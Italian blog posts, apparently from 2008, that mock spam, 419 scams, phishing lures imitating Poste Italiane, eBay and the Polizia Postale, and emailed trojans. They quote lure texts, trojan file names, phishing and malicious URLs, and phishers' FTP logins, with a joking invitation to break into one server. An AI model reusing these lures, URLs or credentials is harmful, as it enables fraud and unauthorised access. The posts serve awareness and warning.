Ho già scritto come lo spam che arriva nella mia casella di posta elettronica aziendale è diverso dal resto. Gli ultimi amicici che mi hanno scritto, poveretti, avranno delle pastigline favolose ma non sono stati capaci a scegliere un traduttore automatico decente. Già il mittente "Pillole senza" non mette perfettamente a proprio agio il lettore. Ma controllate le frasi in neretto:
Migliori migliore medicina e Pillole solo per voi. Visita della nostra Farmacia su Internet e sara amore e giusto. Tanta scelta e cosi a buon mercato ... che ci sono solo qui.
Avremo anche la garanzia che essi non sono soddisfatti. Ordine, senza rischio, veloce, semplice, semplice. I nostri prezzi sono garantiti a buon mercato, confrontare con gli altri.
Del nostro meglio tornare indietro e trovare.
In pratica ci dicono subito (a) di non andare al loro sito e (b) che non saremo soddisfatti. Chissà, magari è una astuta tecnica per evitare qualsiasi lamentela!
(o molto più probabilmente, visto che il sito è stato registrato dalla Xin Net Technology Corporation, i traduttori dal cinese all'italiano latitano)

Per "spam aziendale" intendo quello che mi arriva all'indirizzo email aziendale. In effetti, sembra proprio che gli spammatori non si parlino tra loro, o meglio che non si scambino le loro liste di indirizzi. Le mail della solita "Italian Spam Organization" ad esempio arrivano solo ad Anna e non a me; e i messaggi che tagliano il firewall aziendale non li vedo affatto sulle altre mie caselle di posta, mentre Ugo mi ha comunicato che arrivano anche a lui.
Nel weekend ho ricevuto, a parte i soliti viii di cui ho già parlato, qualche copia di due messaggi. Il primo è di un sito con gratta-e-vinci, scritto in itagliese: l'inizio del messaggio è infatti ScratchCards sta dando via 5 euro alla graffiatura e la Vittoria fino ad un massimo di 200.000 euro!. Sapere che "Tutti i vostri sogni sono un giusto una graffiatura via, non attendono alcun più lungo, cominciano graffiare ora." in effetti non ha prezzo. Il secondo si direbbe un sistema di riciclo di denaro sporco, scritto quasi in italiano perfetto (peccato per il "la chiediamo di compilare il modulo", che sembra quasi dialettale) che inizia pomposamente con Attualmente stiamo accettando i resumes per le seguenti posizioni: Amministratore delegato per i pagamenti on line. È proprio vedo che un posto di amministratore delegato non lo si nega a nessuno, un po' come un posto di allenatore della nazionale.
Mi resta appunto il dubbio di come mai ci sia questa diversità di tipi di messaggi a seconda dell'indirizzo... ma mi sa che me lo dovrò tenere.

La variante della truffa nigeriana dove ti arriva una mail con l'annuncio "hai vinto una barca di soldi" è piuttosto nota, e mi è arrivata dalle aziende più disparate, a partire da Microsoft per finire alla Coca-Cola. Ma questa volta credo che si sia superato ogni record.
Il mittente è Chiesa Cattolica Italiana <info@chiesacattolica.it>, e il testo - sfortunatamente in inglese, non dico ci sarebbe voluto il latino ma l'italiano sì - inizia con
We the entire members of Chiesa Cattolica Italiana hereby notify you as the winner of $650,000.00 US (Six hundred and fifty thousand US dollars only. You are advice to contact immediately you received this mail for Further instruction on how you are to claim your donation prize.
Le frasi sono un po' tagliate nell'originale, si vede che l'anonimo autore segue il mio sistema di scrivere le notiziole applicando solo il 10% della propria attenzione; pertanto non so esattamente perché avrei vinto tutti questi dollari, né perché la Chiesa Cattolica Italiana paghi in dollari e non in euro. Devo dire che "entire members of Chiesa Cattolica Italiana" ha un suono impressionante, anche se la mia prima traduzione è "membri non castrati". Degna di nota è anche la firma del mittente: Executive Rev .Sis Rose Eduardo. Non sono un grande esperto di sigle ecclesiali, ma "Sis" mi suona così tanto "Sister" che mi chiedo da quando abbiano iniziato a fare ordinazioni femminili...

Tornato in ufficio dopo il weekend, mi sono trovato due messaggi di spam (tecnicamente identici, a parte i prezzi leggermente diversi che secondo me sono generati automaticamente dai programmi che creano spam per riuscire a eludere i controlli sul testo: in effetti entrambi i messaggi puntavano a peopleran.com, simpatico sito cinese creato il 29 maggio) nella casella postale dell'ufficio. Tanto per cambiare mi proponevano le solite pastigline. Ma il bello era il loro testo.
Il primo aveva come titolo "Comprare Viii Generico" e nel messaggio, oltre ai vari prezzi, scriveva
Come alternativa alla mitica pillola blu (Viii), esiste in commercio da diversi anni il Ciaaa.
Viii è il primo farc per via orale a curare uomini affetti da Disf Ere, conosciuta anche come Imp.
Il Ciaaa è un trattamento per gli uomini con de e impo.
Il secondo, di titolo "Viii, Spediamo in tutto il mondo", aveva come testo
Ordinare Viii on line sul sito della pillola blu in pochi click.
Viii è un fm in pastiglie per la cura dell'imp maschile. Dilata I vasi sanguigni per permettere il flusso sanguigno che causa l'erz.
Dopo stimolazione sesale il Ci aiuta a rilassare i vasi sanguigni a livello del pene, permettendo l'afflusso di sangue al memro maschile. Il risultato è una migliore ere.
A quanto pare, il sistema di abbreviazioni stile SMS si sta proprio diffondendo :-)

Questa ormai è diventata una rubrica fissa, visto che l'indirizzo email di Anna continua a ricevere questi troiani dall'indirizzo IP 88.255.121.99 e Tiscali continua a non bloccare i messaggi da quell'indirizzo. Stavolta, complice il weekend, di mail gliene sono arrivate due. La prima direi che è un classico: messaggio che dice che avete combinato qualcosa di male.
Polizia Postale: Divisione Reati Internet
Venerdi 30 Maggio 2008 ore 17.00 Roma
Oggetto : Notifica di Reato su Casella di Posta
Si notifica che sulla presente casella di posta , sono stari rilevati reati di ordine informatico.
Se siete vittima di qualche truffa informatica , la nostra divisione tecnica verificherà la vostra testimonianza. E' necessario mettersi in contatto entra 12 ore dalla lettura della presente mail monitorata dai nostri server.
Siete obbligati a fornire le Vs. generalità , in modo da non aggravare la situazione con l'apertura di un'indagine ministeriale.
--- In allegato : Modulo di Contatto e lista reati ----
Comando di Polizia Postale , Divisione Internet. Comando di Roma
Maresciallo Antonio Cava
L'allegato però è venuto male, nel senso che non c'era il solito zip con il troiano ma solo un file ReatiRilevati.txt.pdxk che non serve assolutamente a nulla (dice "Specifiche in "Verbale Notifica" allegato")

Il secondo invece è più divertente: a scriverci è nientepopodimeno che Google! (Su una casella Tiscali, sì). Il titolo è "Disservizio Servizio Postale" e il testo
Gentile Cliente,
siamo a comunicarle che in data 30 Maggio 2008 il servizio di posta elettronica ha subito interventi straordinari di manutenzione a causa di flussi mail provenienti da altri carrier .
Troverà in allegato i messaggi di posta non recapitati. voglia prontamente prenderne visione al fine di non perdere ulteriori comunicazioni .
Distinti Saluti
Servizio Clienti
In questo caso il file zip c'è, e contiene un eseguibile dal titolo "Posta Cleinte.txt.zip" (Cleinte, sì. Ogni tanto qualcuno si sbaglia a scrivere).
Notate che nelle header dei messaggi c'era anche il campo Organization: rispettivamente Polizia Postale e Supporto Servizio Posta. Da questo punto di vista bisogna dire che fanno le cose per bene.
Restate in attesa della prossima puntata, tanto ci sarà di certo!

Per fortuna gli amici russi (per la cronaca, il sito è http://as4r5w6.by.ru/, che il firewall Telecom blocca già; la mail però arrivava da un'adsl britannica bucata) non hanno ancora capito come fare a inviare i messaggi agli italiani, nel senso che non riescono a far vedere le lettere accentate. Chissà se mai impareranno.
Peccato (per loro, si intende), perché l'idea non era affatto malvagia: un messaggio dal titolo "Avviso eBay: Richiesta di chiusura inoltrata" dove si diceva che "in seguito alla tua richiesta abbiamo dato seguito alla richiesta di cancellazione dei tuoi dati personali dal sistema e il tuo account" e si terminava dicendo che se non eri stato tu a chiedere la chiusura dell'account avevi dodici ore di tempo per rispondere... entrando dal signor phisher. Oggettivamente l'ultima frase è stata una caduta di stile grammaticale, visto che il testo esatto è "Se non hai richiesto te chiusura dell account devi rispondere entro 12 ore.", ma sono certo che molti utenti eBay non si sarebbero accorti della sgrammaticatura e dell'apostrofo mancante.

Che ne dite di ricevere una simpatica email con titolo "United Nations have agreed to compensate you with the sum of US$ 500,000,00" e inviata da "Mr kofi Anan" (con l'enne singola, sì. Ma persino en.wiki ha un rimando da quella grafia alla più usuale Annan). Occhei, ci si può chiedere come mai l'indirizzo dell'ex segretario generale delle Nazioni Unite sia della Repubblica Ceca (mrkofi.anan@klikni.cz: klikni è un portale ceco che ti dà email con 6.5GB aggratis e sistema antispam, se vi interessa), ma non sottilizziamo troppo.
Comunque se qualcuno vuole contattare Jim Ovia (z.nigplc@yahoo.com) al posto mio, faccia pure. Tanto il messaggio è stato inviato "ATTN: MY DEAR": andate pure tranquilli.
P.S.: finalmente una truffa nigeriana con un vero nigeriano, appunto Jim Ovia. Diffidare delle imitazioni!

Mi è arrivato un messaggio da PayPal. Quelli veri, coi link che portano a paypal.it.
Mi comunicavano gioiosi che «PayPal ti porta sul FerrariStore.com, il web shop ufficiale del Cavallino Rampante».
Google ha visto il messaggio e l'ha automaticamente infilato in mezzo allo spam.
Dai, che abbiamo qualche speranza di vincerla noi, la guerra contro i messaggi spazzatura!

(le puntate precedenti: [1] - [2] - [3])
L'ineffabile "Italian Spam Organization" oggi invia i suoi trojan (ah: un grazie ad Anna che è stata ormai eletta come Destinataria Preferita del nostro, e mi telefona non appena le arriva uno dei suoi messaggi, perché sa che mi fa piacere leggerli, e a me l'italico spammer non li vuole proprio inviare) sfruttando una delle tante paure degli italiani: ricevere l'avviso di una multa. Come sempre, l'IP da cui viene mandato il messaggio è dalla solita rete turca (88.255.121.95), il mittente è fabio.torrevisi@gmail.com (gmail ormai è famoso, non c'è che dire) e il testo fa
La presente per notificarle la sanzione applicata per "divieto di sosta" in data 02 Maggio 2008.

Articolo contestato n° 141

E' obbligo del conducente regolare la velocità del veicolo in modo che, avuto riguardo alle caratteristiche, allo stato ed al carico del veicolo stesso, alle caratteristiche e alle condizioni della strada e del traffico e ad ogni altra circostanza di qualsiasi natura, sia evitato ogni pericolo per la sicurezza delle persone e delle cose ed ogni altra causa di disordine per la circolazione.

In allegato :

- Documentazione verbalizzata.
- Immagini di ripresa del veicolo.
- Documentazione di contestazione.
- Conteggio punti patente.

Siete pregati di prendere visione di quanto in allegato ed agire di conseguenza entro e non oltre 15 giorni dal ricevimento della presente.

________________________________________________

Qualora volesse opporsi a tale sanzione in allegato trova il modulo riferito alla sentenza di cassazione del 20 Luglio 2001 NR 9909 la quale sminuisce la presunzione di veridicità dei fatti attestati come avvenuti in assenza di verbalizzanti ( immagine ripresa con mezzi digitali ( autovelox ).

Seguirà raccomandata al suo indirizzo.

È abbastanza divertente notare come l'avviso sia ortograficamente corretto, ma semanticamente un po' deboluccio, visto che la multa sarebbe per "divieto di sosta" ma la spiegazione parla di "E' obbligo del conducente regolare la velocità del veicolo". C'è stato un simpatico scambio di email con degli amici:

Fabio: E` ovvio che e` sbagliato, tuttavia ti faccio notare che la sosta viene
definita "circolazione statica" (andare in giro e` "circolazione dinamica"), e che 0 e` una velocita` come tutte le altre. Ergo, se andavi a velocita` 0 (circolazione statica) dove invece avresti dovuto andare a velocita` maggiore di 0, stai in effetti regolando la velocita` in modo non congruo alla situazione della strada.

io: Attenzione. Fare retromarcia (velocità negativa) però non è vietato. Quindi
arriviamo a dire che c'è un range continuo di velocità valido - il limite di velocità si può immaginare come valore assoluto da non superare, anche se ammetto che all'atto pratico in retromarcia non si possa raggiungere il limite - con un singolo punto per cui vale il divieto. Ma a questo punto la tolleranza implicita negli strumenti e recepita nel codice della strada implica che è impossibile accertare una singola velocità, e la multa non può esserci.

Fabio: Lo sapevo, mai mettersi contro un matematto. Hai ovviamente ragione tu.
Occorre modificare il codice della strada.

Marco: Evidentemente la multa sarebbe per aver parcheggiato senza rallentare.
Ci sta tutta.

Il file .scr allegato non sono riuscito a scaricarlo, perché il mio antivirus me l'ha subito messo in quarantena e indicato come TROJ_DLOADER.MJZ; i due .cry sono uno il solito dito medio proteso e l'altro un JPG corrotto (e immagino reso visibile dal troiano come sottoprodotto). Ho il sospetto che siamo però in un punto di stallo, e che ai nostri occorra qualche nuovo guizzo di fantasia anche per i virus da inviare, oltre che per il testo dei messaggi allegati.

Qualche giorno fa - ma non essendo stato al PC, l'ho vista solo ieri - Mattia mi ha inviato un simpatico esempio di phishing, tanto per cambiare contro PosteItaliane.
Gli anonimi spammatori comunicavano con gioia che il sito poste.it aveva una nuova funzionalità... il filtro antispam. Inutile dire che le istruzioni per attivare il filtro si sarebbero trovate a casa del phisher! (per la cronaca, il sito era http://061093009137.ctinets.com/~fx/ che in questo momento non esiste più)
Tra l'altro, mi è venuto in mente di dare un'occhiata alla mia casella @poste.it. C'erano quattro messaggi, tutti di phishing: nessuno però di poste.it. Almeno su quello sono bravi!

A volte mi viene il dubbio che lo spam non sia distribuito in maniera uniforme. Ad esempio quando ieri mi sono collegato su una mia casella alternativa gmail (che non uso se non per salvare alcune mailing list) ho visto decine di messaggi sulla TV satellitare che erano per me sconosciuti.
I messaggi che riceve Anna sono di tipo ancora diverso: a quanto pare il suo indirizzo email è finito nelle maglie della solita "Italian Spam Organization", quella di Carlo Montorsini e Alberto Zemen. L'indirizzo IP da cui il messaggio è stato spedito è infatti 88.255.121.99, dalla solita rete IP turca; il testo è inoltre scritto in italiano impeccabile per quanto l'argomento sia improbabile. Stavolta "Marco Bellini", della Bellin LTD, scrive così:
Egregio Dott.
Siamo ad informarla che il suo nominativo è stato selezionato dalle liste dei residenti del suo comune. La invitiamo a verificare la correttezza dei suoi dati, nel file allegato e renderci partecipe di eventuali cambiamenti relativamente ai suoi dati anagrafici.
Il tutto per tenerla informata su gli sviluppi delle opportunità di lavoro nelle vicinanze della sua residenza o dove preferisce.
La ringraziamo per la fiducia accordataci e ci scusiamo se con la seguente mail le abbiamo recato alcun danno.
Distinti Saluti
Il. Resp. Amm. Marco Bellini
Enjoy Our Services
Il messaggio poi termina con i soliti inutili disclaimer ("questo messaggio è confidenziale/this message is confidential, bla bla bla") e la notifica che è stato controllato da AVG che l'ha trovato senza virus (!)
Nella tradizione dei nostri, il troiano è all'interno di un file .zip. Lo zip si chiama dati_esistenti.zip, mentre il troiano è pdfxreader.exe. Rispetto al passato, e mostrando un certo senso dell'umorismo, il file dati_esistenti.jpg.pdfxs è in realtà un file di testo, che recita "Impossibile visualizzare il file. Utilizzare pdfx reader in allegato !".
Come vedete, è inutile sperare che le autorità facciano qualcosa al riguardo: vi tocca stare attenti per conto vostro.

Ho già parlato più volte della "truffa nigeriana" (detta anche 419, dal numero dell'articolo del codice penale nigeriano al riguardo, che tanto non serve a nulla visto che non credo che abbiano mai condannato nessuno). Sono quei messaggi che ti arrivano da moglie/figlio/segretario di qualche pezzo grosso africano appena morto, che ti dicono che hanno qualche milione di dollari USA su un conto bloccato e ti chiedono di fare una triangolazione sul tuo conto, promettendoti una generosa ricompensa.
Essendo questi spam spediti a mano uno per uno, e non inviati da uno spambot, sono molto difficili da bloccare automaticamente; ma mi sa che i migliori filtri antispam ora ce la facciano. Che hanno pensato allora questi tipi? Un'idea semplicissima: usare un intermediario. Su due delle mie caselle email che non uso mi sono arrivate delle segnalazioni da LinkedIn che stavano per scadere degli "inviti per diventare parte del network professionale di [nome dello spammatore]". Ma se accetto il loro invito, posso diventare punibile per ricettazione?

Il phishing che presento oggi è, come capita spesso, per cercare di carpire la vostra password sul sito di Poste Italiane. Il testo in effetti è un po' difficile da comprendere, e si direbbe tradotto parola per parola, come potete vedere.

Voi siete stati scelti da Poste Italiane online dipartimento di prendere parte al nostro veloce e facile di ricompensa sondaggio.
In cambio offriamo +50,00 EUR di credito tuo account - solo il tuo tempo!

Che ci hanno aiutato a capire meglio come si sentono i nostri clienti, i benefici a tutti.
Le informazioni che ci fornisci è tutto non sensibili e anonimo - Nessuna parte di esso è tramandato a terzi gruppi.
E verranno memorizzati nel nostro database sicuro per il massimo di 3 giorni, mentre noi processo i risultati di questa indagine a livello nazionale.
Vi preghiamo di ricambio due minuti del suo tempo e che prendono parte a questa offerta unica!

Per la cronaca, il link vi porta a http://www.cvvm.ru/cache/ che a sua volta finisce su http://www.netsurfer.gr/web/bancopostaonline/cartepre/online - il che mostra come sempre l'interconnessione totale della rete.
Il "facile di ricompensa sondaggio" è una di quelle chicche che rende sempre piacevole la lettura a chiunque abbia avuto tra le mani "Asterix e i britanni"... ma questo l'ho già scritto a suo tempo. Invece volevo fare notare come il phisher si preoccupi di rendermi edotto che non ho nessun problema di privacy: nel questionario non ci sono dati sensibili, e comunque i dati verranno memorizzati al massimo per tre giorni (e poi si risorge, immagino).
Da un punto di vista più tecnico, infine, c'è una novità. Viene fatto un controllo sulla coppia username-password, prima - almeno credo, visto che non sono riuscito ad arrivare fino a quel punto - di chiedere la password dispositiva. Insomma, rompono le palle ai giocherelloni come me che mettono dati a caso!

Il mese scorso vi avevo raccontato di "Alberto Zemen Detective" e del suo trojan. Stavolta le mail sono arrivate direttamente a me da un sedicente Carlo Montorsini, che afferma:
Gentile Cliente, stiamo eseguendo i dovuti accertamenti sul suo sistema informatico, il suo indirizzo email ci è stato segnalato da terzi come fruitore di materiale scaricato illegalmente dalla rete. La sua posta elettronica è sotto controllo già da 10gg, la preghiamo pertanto di voler verificare se il suo nominativo compare nella lista degli indagati Marzo 2008 onde dichiarare la sua estraneità alla detenzione di materiale indebitaménte contraffatto.
Certi di una sua volontaria collaborazione porgiamo
Distinti Saluti
Carlo Montorsini - Assessments Director
Internet VerifyCenter s.p.a 2002-2008
Come vedete, a parte qualche virgola a casaccio che lo fa sembrare ancora più burocratico e il buffo "indebitaménte", sembra assolutamente normale. L'allegato indagati-2008.zip contiene tre file: il trojan List-Viewer.exe, un file nomi-marzo-2008.cry che come nel caso di Zemen si direbbe un JPG farlocco, e un nominativi-aprile-2008.dat che invece, rinominato in jpg, fa vedere un simpatico dito medio alzato (i curiosi lo possono vedere qua. Garantisco che cliccare non danneggerà il vostro pc :-) )
L'indirizzo della macchina da cui è stato inviato il trojan è 88.255.121.86, un IP turco, ma come ormai sapete questo non significa nulla. Per il resto, chissà quando Escopost si sveglia (il reato viene commesso da italiani, quindi sono loro che devono attivarsi)
Aggiornamento: (14 aprile) MdI mi comunica che nella base dati di SpamHaus il sito è indicato come nostrano: "assegnato, sotto il controllo di, o che fornisce servizi a una organizzazione professionista di spam gestita da Sergio Livrieri / NonSolo-Web" (testo loro, traduzione mia).
Aggiornamento: (4 luglio): a oggi SpamHaus ha tolto nel record indicato sopra qualunque riferimento a NonSolo-Web: il testo ora recita Italian spam organization previously using 88.255.104.128/25 is now continuing from here, senza fare nomi di persone. Evidentemente la precedente associazione che avevano fatto era senza fondamento, e mi scuso di averla riportata.

Mi è appena arrivato un messaggio dalle solite sedicenti Poste Italiane. Stavolta però il messaggio non è stato filtrato da gmail e me lo sono trovato nella posta in arrivo; e in effetti, oltre ad avere un perfetto burocratese (artt. per articoli è un tocco di finezza), il testo aveva anche le lettere accentate al posto giusto. In effetti, è stato spedito da Aruba.
Anche il sito di phishing era fatto abbastanza bene, pur senza un nome a dominio ma solo con un indirizzo IP: per la cronaca, 217.201.199.39 che al primo colpo non era ancora conosciuto da Firefox come "web forgery" (adesso sì). I simpaticoni mi sono caduti sull'inserimento dei dati del conto corrente: ABI e CAB credo che siano unici per tutti gli utenti Posteitaliane, quindi non serviva chiederli. In compenso chiedevano il CIN, oltre che il codice dispositivo, e garantisco che occorreva metterlo giusto: sono dovuto andare a cercare un algoritmo per crearlo correttamente...
Ma il punto più sconcertante (per me) è che l'indirizzo IP in questione è allocato a ... Telecom Italia Mobile. Ho appena telefonato al gruppo di sicurezza informatica interna :-)

Cosa succede se vi arriva un messaggio dal titolo "Yahoo! Groups: You're invited!"? Se non sapete l'inglese, probabilmente nulla. Altrimenti andate avanti a leggere il titolo, e scoprite il nome del gruppo al quale, fortunelli quali siamo, siamo stati invitati: "legitimate_homebased_business101".
Proprio così. Il simpatico spammatore ha trovato un sistema assolutamente sicuro per saltare i controlli antispam. Il messaggio infatti arriva da yahoogroups, indirizzo assolutamente legittimo che viene fatto passare da tutti i mailer. Credo sia inutile dire che il gruppo è già stato cassato da Yahoo! (il messaggio era di sabato...) ma tanto l'amicone non si è certo preoccupato, visto che all'interno del messaggio spiegava che le istruzioni per "guadagnare legittimamente da casa" si trovavano cliccando su un link esterno.
I link, per la cronaca, sono a clickaudit.com, un servizio "quasi" come tinyurl.com con la differenza che ti tracciano da dove arrivi...

È da qualche giorno che mi capita, mentre navigo, di vedere un messaggio popup che mi avvisa che un applet è stata scaricata, la sua provenienza è sicura, e se voglio lanciarla. Come potete immaginare, io da un sito che si chiama ad esempio http://w74.vq265j.won-ppp.info non accetterei nemmeno una caramella: generalmente dico di no, e amen. Ma ieri sera mi è capitato mentre ero al telefono con xlthlx, e lei mi fa "sì, capita spesso con Splinder". In effetti avevo appena aperto un link a un blog su Splinder. Guardo il sorgente, e non vedo nulla di strano. Riapro il link, e non vedo nulla di strano. Guardo nella cache, e vedo i seguenti file:
- http://w74.vq265j.won-ppp.info/adsl.jpg?1206211871
- http://w74.vq265j.won-ppp.info/htm/winscript-40.htm?1206211871
- http://w74.vq265j.won-ppp.info/htm/script-55.php?1206211870&cc2=it
- http://w74.vq265j.won-ppp.info/htm/cc1.php?p=55&cc2=it
oltre che una di quelle immagini da un pixel per uno che servono per vedere se tu ti sei connesso.
Mi chiedo se effettivamente il problema sia interno a Splinder: in ogni caso, se vedete queste strane richieste, ricordatevi di rifiutarle!
Aggiornamento: (26 marzo) Si direbbe che la colpa non sia di Splinder, ma del contatore di statistiche a superstat.info. Sto preparando una notiziola a riguardo.

Ugo mi ha detto che ieri ne hanno parlato anche al tiggì. Non so nulla, la tivvù non la guardo: so solo quello che capita a me :-)
Il messaggio che ho ricevuto stamattina è un classico, a parte una strana minuscola e il punto iniziale:
.Ci SONO MESSAGGI PER TE!
chiama da tel. fisso 89.94 377 91
info e costi www.imessaggi.net/
Il mittente è un numero che a prima vista può sembrare Vodafone, visto che è +37493893766 e un mezzo dislessico come me può leggere "347": ma in realtà questo è un numero telefonico armeno, e in effetti il messaggio è stato spedito dall'Armenia: il centro servizi ha infatti come numero +37493297333. In pratica, qualcuno ha comprato con un forte sconto un pacco di sms dagli armeni, e lo sta usando per spammare amabilmente la gente.
Ma la parte più interessante è quella che riguarda il sito www.imessaggi.net. Casualmente non si trova traccia dell'899 indicato nel messaggino; c'è solo una presa per i fondell... no, scusate il tecnicismo, una noticina in fondo alle condizioni d'uso che afferma verbatim «Il suo numero non è presente nessun database, il messaggio che ha ricevuto potrebbe esserle stato inviato da un utente del sito.» A parte che io un amico così lo menerei, vi lascio immaginare che razza di disclaimer possa essere. Ma che offre esattamente questo sito? Un fantasmagorico servizio. Tu chiami un numero 899, e «puoi inviare la bellezza di 270 sms al prezzo strepitoso di 15 euro IVA compresa, poco più di 5 cent cadauno!» Occhei, è più vicino a sei centesimi che a cinque, ma la matematica non deve essere il forte di questi amici; tra l'altro, i 270 SMS sono assolutamente contingentati - massimo 9 al giorno per trenta giorni consecutivi - quindi il costo pratico è ben più alto, e con ogni probabilità se una persona deve inviare tutti quei messaggi fa più in fretta a comprarsi una carta servizi dell'operatore che gli interessa.
Ma chi sono questi amiconi di "imessaggi.net"? Non si sa. Il Whois riporta infatti questo:
PrivacyProtect.org
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
Tel. +45.36946676
Insomma, si sono premuniti per la loro privacy di usare un servizio anonimizzatore dei dati personali... e si sa che quando si tratta di soldi gli svizzeri sono muti come tombe. Vabbè. Ma tanto voi affezionati lettori non ci sareste mica cascati, vero?

Tra ieri e oggi, Anna ha ricevuto due messaggi da tale "Alberto Zemen Detective", con titolo PRATICA CHIUSA (tutto maiuscolo) e testo

Ciao Beppe, ho chiuso la pratica investigativa su Lara, trovi in allegato il viedo (versione intagrale). Mi raccomando massima riservatezza.
Alberto Zemen Detective.

Occhei, un paio di errori di ortografia, ma nulla di così strano. Né uno va a vedere qual è l'indirizzo IP del mittente (88.255.121.86, un bel provider turco). Anna ovviamente non ci è cascata, ma se qualcuno provasse ad aprire l'allegato Video-10-03-08.zip (di 46K, alla faccia della compressione dati!) troverebbe un file LaraVideo.Mpg.dat che non sono riuscito ad aprire (in teoria è un file jpg di 32x32 pixel, ma anche rinominato mi dà errore) e un file MpegPlayer.exe che ovviamente non mi sono certo sognato di aprire :-)
Ecco un classico esempio di programma troiano: perché mai uno dovrebbe andare a vedere un video che ha ricevuto "per sbaglio"? Beh, perché nell'immaginario collettivo quel video potrebbe avere delle immagini porno amatoriali, no? Ecco. Chi è causa del suo mal, pianga sé stesso.

Essendo io un curiosone, faccio spesso ricerche sul mio cognome (che poi è anche il nome di un paesone, quindi può capitare relativamente spesso). Bene, oggi ho ottenuto questo risultato. In pratica, come potete notare dando un'occhiata ai brani riportati, sembra che su Google Groups qualcuno stia creando dei gruppi e li popoli con "articoli" formati da parole a caso.
È vero che testi come «Vojvoda Verstegan (1787-1851) was culmulated in Codogno, Malvasia, but blogged to the Ss-163 Crichtons at an non-kaled age.» hanno una loro intrinseca poeticità e sono sicuramente migliori delle poesie Vogon (ah, ieri era l'anniversario della nascita di Douglas Adams). Però naturalmente la vera ragione di fare questi gruppi è poter mettere all'interno dei post una serie di link... ad altri gruppi Google. Il tutto immagino per far salire artificialmente il pagerank dei gruppi stessi e quindi usarli per spammare qualcosa di serio. La domanda è: quando se ne accorgeranno a Google?

Di spam in turco ne ricevo credo da un decennio. Ma stavolta trovarmi un messaggio dall'eloquente :-) titolo "Ban muon ton it Tien ma dat hieu qua kinh doanh cao khong?" mi ha stupito per un attimo.
Sono così andato a verificare, e la mia ipotesi era corretta: è spam vietnamita (da INking@1088.vn, per la cronaca). Non parlando la lingua - so a malapena riconoscerla dai caratteri usati - non posso garantire di che tratti lo spam; ma guardando la figura oserei dire che è un servizio di escort locali. (Per i guardoni: il disegno è assolutamente casto, è inutile cliccarci sopra per vedere chissà che).
Mi chiedo solo se Ho Chi Minh sarebbe felice di sapere come i Vietcong si siano trasformati nei decenni...

Le truffe nigeriane (i cosiddetti 419, dall'articolo del codice penale locale assolutamente disatteso), in cui qualcuno ci chiede aiuto per portare all'estero dei soldi di qualche ex dittatore o ministro improvvisamente morto) sono una costante da una decina d'anni almeno. Solo che quello che mi è arrivato oggi è il primo caso di un simile messaggio in "italiano". Scusate le virgolette, ma date un'occhiata al testo:
Buongiorno,
So che non lo conoscete personalmente, tuttavia io voglia che lo aiutavate dopo lettura della mia posta. Tengo a metterli al corrente che lavoro in una banca qui in Costa d'Avorio come direttore del servizio dei trasferimenti, fuoco Sig.ra. Lany Johnson aveva depositato la somma di $3.500.000 alla nostra banca prima che sia morta e da quando è morta nessuno non è venuto per i reclami di questi fondi.Vorrei dopo lettura della mia posta che la contattavate affinché possa fornirvi le precisazioni complete sul modo in cui i fondi saranno trasferiti nel vostro conto bancario senza alcuno problema.
Per la vostra informazione questa transazione è al 100% senza rischio. Per il vostro aiuto vi darò il 30% di questi fondi.
Grazie e che dio voi benedica.
Io voi pregati di autorizzare l'espressione delle mie sensazioni più distinte.
Il Sig. Tim Benson.
Devo comunque aggiungere che sarà anche vero che Repubblica (cartacea) oggi diceva che l'italiano è la lingua con la maggior quantità di phishing dopo l'inglese; però la settimana scorsa mi era arrivato un 419 in tedesco, sicuramente più corretto di quanto lo parli io, tra l'altro. Forse siamo messi così male che i phisher ritengono che non serva nemmeno scrivere in italiano corretto :-(

Sicuramente (beh, quasi) sapete che cosa è tumblr: un raccoglitore pubblico di cose trovate in rete, che assomiglia a un blog ma non è un blog. Anch'io ho un tumblr, se non ve ne foste accorti: di per sé è indicato da qualche parte qui nella pagina delle notiziole, ma forse dovrei modificare il template.
Bene: Phonkmeister segnala che è possibile ottenere automaticamente una segnalazione a caso da un tumblr, attaccandoci dietro "/random". Quindi (quasi) chiunque cliccherà su http://mau.tumblr.com/random troverà qualcosa di diverso che in un momento della mia vita ho trovato interessante.
Due soli appunti: manca un casualizzatore "globale" su tutto il sito, e poi io avrei appunto scritto "randm" invece che "random" :-)

Sono passati nove mesi da questo post, ma io ne sono venuto a conoscenza solo oggi, e quindi ne parlo oggi.
Così a prima vista non sembra ci sia nulla di strano: un programmatore informatico che fa notare, in un newsgroup dedicato agli handicap, che i CAPTCHA non possono essere usati dai ciechi.
Peccato che facendo una ricerca "Fabio Petta spam" si scopra che più che un "programmatore informatico" il nostro amico e il suo fratello Stefano abbiano tutta una serie di siti da cui arrivano richieste di iscrizione non esattamente in stile opt-in. In effetti i CAPTCHA sono scomodi, in certi casi...

Di per sé, questo messaggio di phishing che mi è arrivato non è nulla di strano: il sedicente domandante mi scrive
"Ciao, vorrei sapere: 1- ? possibile acquistare l'oggetto fuori asta? e se s? a quale prezzo? 2- ? possibile pagare l'oggetto con ricarica su carta Postepay? Grazie per l'attenzione...Distinti Saluti."
(si sa che le lettere accentate danno grossi problemi, soprattutto se di default parti da un alfabeto che non è quello latino). Per il resto, l'italiano è assolutamente corretto, e magari uno ci casca anche. C'è al limite una punta di interesse per un piemontese come me, che sorride a vedere che il nome del mittente è "giuvinott", ma nulla più. La parte più interessante è però l'indirizzo del phisher, che copio qua nella sua bellezza geek (anche se diviso in due righe per non sballare il layout):
ftp://mysugndj.nightmail.ru:alinaa@ftp2.nightmail.ru/ cgi.ebay.it.ws.eBayISAPI.dll.ViewItem&item.asp
È di un server russo, e fin qua nulla di strano; ma è un indirizzo ftp con nome e password. Non tutti sanno che è possibile connettersi via web a un server - nel nostro caso ftp2.nightmail.ru - indicando esplicitamente nome utente - mysugndj.nightmail.ru - e password - alinaa. Dall'ufficio non posso usare ftp, ma se qualcuno vuole divertirsi a craccare il craccatore...
Aggiornamento: (15:45) il giuvinott si è allargato: mi ha spedito altri due phishing. I nuovi indirizzi sono
ftp://accedi2:alinaa@ftp.hotbox.ru /cgi.ebay.it.ws.eBayISAPI.dll.ViewItem&ampampitem.asp
ftp://accegidfh.nm%.ru:alinaa@ftp2.nm.ru /cgi.ebay.it.ws.eBayISAPI.dll.ViewItem&amp;item.asp
Insomma, abbiamo capito che non vuole correre il rischio di dimenticarsi le password :-)
Aggiornamento 2: (1. febbraio) ogg l'amico è arrivato come
ftp://accedimys:alinaa@ftp.krovatka.su/cgi.ebay.it.ws.eBayISAPI.dll.ViewItem&item.asp. Bisogna dire che è un tipo costante.

